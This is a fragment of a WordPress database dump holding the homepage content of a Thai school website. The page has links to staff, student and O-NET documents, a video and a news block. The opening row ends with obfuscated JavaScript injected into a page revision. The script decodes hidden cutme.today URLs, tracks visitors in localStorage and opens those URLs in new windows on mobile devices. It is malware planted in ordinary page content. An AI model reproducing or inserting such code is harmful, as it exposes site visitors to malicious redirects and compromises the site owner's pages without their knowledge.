_0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-09-24 11:26:31','2024-09-24 04:26:31','',19,'http://watprato.ssk.in.th/?p=426',0,'revision','',0),
(428,2,'2024-09-24 11:30:12','2024-09-24 04:30:12','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"full\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":418,\"width\":\"566px\",\"height\":\"auto\",\"sizeSlug\":\"large\",\"linkDestination\":\"none\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-large is-resized is-style-default\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03-1024x346.jpg\" alt=\"\" class=\"wp-image-418\" style=\"width:566px;height:auto\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 